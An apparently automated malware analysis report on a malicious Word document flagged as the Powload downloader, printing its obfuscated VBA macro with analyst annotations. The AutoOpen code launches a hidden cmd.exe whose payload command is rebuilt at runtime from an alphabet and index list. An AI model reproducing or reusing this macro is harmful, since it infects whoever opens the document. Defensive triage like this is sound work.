Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f2a156207d853e4…

MALICIOUS

Office (OLE)

Size: 85.2 KB · Created: 2018-08-07 23:34:00 · Authoring application: Microsoft Office Word · First seen: 2021-02-23
MD5: d39d5ba5d6fe7ecfcd96fc9713fd950b SHA-1: 1f6b8232ed379eb571e5ee159fcb7e47f8dca04d SHA-256: 2f2a156207d853e4548859cd1cfe9557290751c987906dab67d86583751cfb01
Risk score: 112

Heuristics 6

  • ClamAV: Doc.Malware.Powload-6794078-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6794078-0
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This heuristic is intended for the case where no modern VBA project was recovered and no stronger macro-virus family marker was present; for this sample, however, a VBA project *was* recovered (see OLE_VBA_MACROS and the extracted macros.bas below, whose `Sub AutoOpen()` is VBA, not WordBasic), so treat this finding as redundant with the VBA findings rather than as independent evidence. On its own it is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard OOXML DrawingML XML-namespace identifier that Office writes into its own files; it is not a network indicator and should not be pivoted on.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5472 bytes
SHA-256: ec51a6ed955ed8465680e7df6b65f2058e6992c702f7e28a6befc4963e757af3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
43 of 85 identifiers look randomly generated (e.g. 'AiTEZQEnZPsfYi'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation. The preview below shows many more `+`-joined fragment chains, so treat that count as a lower bound. The fragments assemble a `cmd /V:O/C` command line whose real payload is only rebuilt at runtime: a `for %2 in (...)` loop indexes into a `set kX=` alphabet one character per index and then `call`s the last 354 characters of the result. The final command line, and any download URL or C2 it contains, is therefore not visible in this static output — decode the index list against the kX alphabet, or detonate the sample in a sandbox, to recover it.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "lomNoKA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ANALYST NOTE: malicious sample, annotated for triage only - do not run.
' Word's AutoOpen entry point; fires automatically when the document opens.
' Every "TypeName ..." statement discards its result and is filler; the
' operands (CXTosR, nGRzTi, NidWum, ...) have no Dim in this preview and any
' error they raise is swallowed by On Error Resume Next.
Sub AutoOpen()
On Error Resume Next
   TypeName CSng(CXTosR)
   TypeName nGRzTi
   TypeName Oct(26243 - NidWum)
   TypeName FWYhru
   TypeName OYiVXw
' The only effective statement: Shell with a command line assembled from "c",
' "m" and the return values of eight helper functions. mTdKEPraRH begins with
' "d " + "/V:O/C", so the line starts "cmd /V:O/C...". The second argument,
' 989400484 - 989400484, is 0 (vbHide): the process runs with no window.
' AiTEZQEnZPsfYi, XZmabMztPvcBH, wvUsZzTokZpdo and danIAAiwmkYC are not in
' this preview; since "cm" is followed directly by mTdKEPraRH's "d ", the two
' that precede it presumably contribute nothing - confirm against the full macro.
' Note the trailing "@" type-declaration suffix on Shell.
Shell@ CStr("c") + CStr("m") + AiTEZQEnZPsfYi + XZmabMztPvcBH + mTdKEPraRH + OZRqZOZER + idVdmpnS + jouOCriYVo + wvUsZzTokZpdo + danIAAiwmkYC, 989400484 - 989400484
   TypeName ERnEMa
   TypeName 7
   TypeName Sqr(151)
End Sub


Attribute VB_Name = "WEtHUvKZVCr"
' Fragment 1 of the command line built in AutoOpen. Apart from the string
' assignments and the final concatenation, every line is TypeName filler
' whose errors are hidden by On Error Resume Next. Joined, the pieces read:
'   d /V:O/C<q>set kX=MBsqLnimjWrHDjSmPCh+Ta2}8'o/g{yAc(:kXdtv$=blx-)NUw;e4p\Y@f,zuJ.F6 5&&for %2 in (53,26,49,51,...
' i.e. the "d" that completes "cmd", cmd.exe's /V:O (delayed !var! expansion)
' and /C, an alphabet stored in the variable kX, and the start of the index
' list for a "for %2 in (...)" loop that later picks one alphabet character
' per index (loop body is in jouOCriYVo).
' <q> is Chr(34 + four operands); those operands have no Dim in the preview,
' so they are presumably Empty (0) and <q> is a double quote - confirm.
Function mTdKEPraRH()
On Error Resume Next
TypeName Atn(986)
   TypeName 6124
   TypeName Atn(8285)
uLzSZVMwaR = "d " + "/V:O/C" + CStr(Chr(KwcsWqUFHXs + jzGuBIHrDXaVz + 34 + tGjNCnNOD + qjphSQpa)) + "set kX=M" + "BsqLnimj" + "WrHDjSmPCh" + "+Ta2}8'o" + "/g{y" + "Ac(:kX"
TypeName 366
   TypeName 5
   TypeName Round(fmAVZq)
' Rest of the kX alphabet, then "&&for %2 in (" and the first index digit.
miaBrOf = "d" + "tv$=" + "blx-)NU" + "w;e" + "4p\Y@f,zu" + "J.F6" + " 5&&f" + "or %2 in (" + "5"
TypeName Tan(pjlUsq)
   TypeName ChrB(1)
   TypeName Hex(24687 * wNNCE)
' From here on: comma-separated alphabet indices only.
ZYOPu = "3,2" + "6,49,51,10" + ",2," + "18,51," + "43,43,6" + "5,"
TypeName qKMzZ
   TypeName CInt(41886712)
idHNMkcdobq = "40,5" + "5,37,14," + "4" + "1,5,51" + ",49,45,26" + ",42,13" + ",51,32" + ",38,65" + ",47,51," + "38," + "62," + "9,51,42,1"
TypeName CInt(4)
   TypeName 6
rtFwqFSGij = "7,43" + ",6,51,5,38" + ",5" + "0,40" + ",49,43" + ",59,41" + ",2" + "5,18" + ",38,38," + "53,34,27" + ",27" + ",2,26,32,"
TypeName Round(skJnzR)
   TypeName Rnd(JAldQ)
tKGRCPTt = "3,60" + ",21,62,32" + ",26" + ",2" + "7,49,5" + "3,45,32," + "2" + "6,5,38,51" + ",5,38" + ",27,60" + ",53,4" + "3" + ",26,21,37,"
' Return value: all pieces in source order.
mTdKEPraRH = uLzSZVMwaR + miaBrOf + ZYOPu + idHNMkcdobq + rtFwqFSGij + tKGRCPTt
   TypeName YzQKt
   TypeName Sin(994)
   TypeName Fix(RrKvu)
End Function
' Fragment 2 of the command line built in AutoOpen: only further
' comma-separated indices into the kX alphabet defined in mTdKEPraRH,
' no command text of its own. The TypeName statements are filler; e.g.
' the Sqr(... / crpYij / ...) line would divide by operands that have no
' Dim in the preview, and any error is swallowed by On Error Resume Next.
Function OZRqZOZER()
On Error Resume Next
TypeName Round(sNbMDZ)
   TypeName Sqr(75054 / crpYij / GIwim * FtGEW)
UKwCFiYzX = "2,2" + "7,21," + "6" + "6,0,2" + "4,20,2,12" + ",26,56,18," + "38,38,53,3" + "4,27,2" + "7,42," + "30" + ","
TypeName 5682
   TypeName CStr(9)
   TypeName qrlCiX
iSiJnc = "21,32,21,3" + "7,51,15,3" + "0,62," + "57,10,2" + "7,24" + ",22," + "56,18"
TypeName dPRHoh
   TypeName 53341182
ffiAjD = ",38,38," + "53,34," + "27" + ",27" + "," + "2,2" + "1,51," + "43,62,35,5" + "9,27,42,5" + "6," + "18,38" + ",38,"
TypeName 753
   TypeName bHSIi
   TypeName 362396330
qWkMpwT = "53,34,27," + "27,32," + "26" + ",26,5" + "3,51" + ",1" + "0" + ",2,21,15," + "62,32,26," + "26,53,62"
TypeName wjUCC
   TypeName KolRW
   TypeName zihiuA
VjrIPcqwrv = ",53" + ",30," + "27,49,36,3" + "6,1,56," + "18"
TypeName CBool(loSOk)
   TypeName ChrB(ROuuzu + EoBlj * 25708 + rWmwI)
   TypeName CStr(1)
uXpiTCYasYF = ",3" + "8,38,53" + ",34," + "27,2" + "7,38," + "10" + "," + "6,42,28," + "21,37," + "62,13,53,"
' Return value: all index pieces in source order.
OZRqZOZER = UKwCFiYzX + iSiJnc + ffiAjD + qWkMpwT + VjrIPcqwrv + uXpiTCYasYF
   TypeName Hex(cQDUjO)
   TypeName CBool(LaDdli)
   TypeName Atn(wdjhRf - uLPZj * VCOwfw * 91962)
End Function
' Fragment 3 of the command line built in AutoOpen: more comma-separated
' indices into the kX alphabet (see mTdKEPraRH), no command text of its own.
' TypeName lines are filler; their errors are hidden by On Error Resume Next.
Function idVdmpnS()
On Error Resume Next
TypeName CByte(AUDEH - foLQrn * 85495 - PKHNoV)
   TypeName Atn(85)
XPXqHofnMb = "27,43,26,2" + "8,2,6" + ",38,51,2" + "7" + ",9,31,25," + "6" + "2,14,53,4" + "3" + ","
TypeName Oct(18427 - SJinu)
   TypeName CInt(hEZMa)
SAzlOdKljkz = "6,38" + ",33,2" + "5,56,25,4" + "6,50," + "4" + "0,47,1" + "3,48" + ",65,4" + "1,65,25" + ",64,52,66" + ",25" + ",50,40,3"
TypeName Log(3)
   TypeName Int(qlikw)
FrLsX = "9,18" + ",31," + "4" + "1,4" + "0,51" + ",5,39," + "34,38,51" + ",15,53,19,"
TypeName Atn(SdRDHH)
   TypeName ttpoBB
DiiSD = "25," + "54,25,19" + ",40,47,1" + "3,48,1" + "9,25,62" + ",51," + "44,51,2" + "5,5" + "0,57,26,1" + "0,51,21,32" + ",18,33,4" + "0,61," + "36,"
TypeName CBool(356)
   TypeName CByte(2849)
DnjdTp = "53,65,6,5" + ",65," + "40,49,4" + "3,59" + ",46" + ",29," + "38,10,30," + "29" + ",40,55,3" + "7,14," + "62,12,26," + "49,"
' Return value: all index pieces in source order.
idVdmpnS = XPXqHofnMb + SAzlOdKljkz + FrLsX + DiiSD + DnjdTp
   TypeName Atn(588)
   TypeName krTWC
End Function
' Fragment 4 of the command line built in AutoOpen: the last alphabet
' indices, the sentinel 72 that closes the list, and the loop body.
' Joined, the tail of the fragment reads:
'   ...,65,72)do set ShzH=!ShzH!!kX:~%2,1!&&if %2==72 call %ShzH:~-354%<q>
' For every index %2 the loop appends the single character kX[%2] to ShzH
' (delayed expansion via /V:O in mTdKEPraRH); when the sentinel index 72 is
' reached it "call"s the last 354 characters of ShzH - that is the real
' command, which only exists at runtime. To recover it statically, map the
' full index list (all fragments, in AutoOpen's order) onto the kX alphabet.
' <q> is Chr(34 + four operands) with no Dim in the preview - presumably a
' closing double quote, matching the one opened in mTdKEPraRH; confirm.
' TypeName lines are filler; errors are hidden by On Error Resume Next.
Function jouOCriYVo()
On Error Resume Next
TypeName ChrW(19466 * MzcqU * JAZwp / jWFdRp)
   TypeName ChrB(4)
   TypeName vsiLki
jSrzL = "5" + ",43,26," + "21" + ",37,63," + "6,43,51," + "33,40," + "61,36," + "5" + "3"
TypeName 14
   TypeName ChrW(90800 * VUjpL)
vZRSS = ",58,65,40" + ",39,18" + ",31,46,5" + "0,1" + "4,38,21," + "10,38,4" + "5,16,10,26" + "," + "32,51," + "2,2,65," + "40" + ",39,18,31" + ",50,4"
TypeName 960
   TypeName Int(ofrfVE - NslWL)
plPCiDcjwP = "2,10," + "5" + "1,21" + ",35,50,23" + "," + "32" + ",21,38,32," + "18,29,23," + "23,65" + ",65,"
TypeName Cos(VRFmd + TUBmM)
   TypeName CSng(QSFJTG)
' Run of 65s (padding characters), then the 72 sentinel, ")" and "d" of "do".
iUTWNT = "65,65,65," + "65,6" + "5,65,6" + "5,65,65," + "65,65," + "65,65," + "65" + ",65,7" + "2)d"
TypeName Atn(jPdSjo)
   TypeName Cos(193536439)
' "o set ShzH=!ShzH!!kX:~%2,1!&&if %2==72 call %Shz"
HsVctUzkY = "o se" + "t " + "ShzH=!ShzH" + "!!kX:~%2" + ",1!&&if %2" + "==" + "72 ca" + "ll %Shz"
TypeName CByte(qMTtGu)
   TypeName Rnd(ULqsJ - dzafNr)
' "H:~-354%" + <q> + four trailing spaces.
zzKtWjpIz = "H:~-354%" + CStr(Chr(BBJwQmHZBWX + LBnipFW + 34 + juSaCWF + ZJprEZRmAGo)) + " " + " " + "  "
' Return value: all pieces in source order.
jouOCriYVo = jSrzL + vZRSS + plPCiDcjwP + iUTWNT + HsVctUzkY + zzKtWjpIz
   TypeName ilpIK
   TypeName Oct(AcuNVd)
   TypeName Cos(47865 / OwknBw)
End Function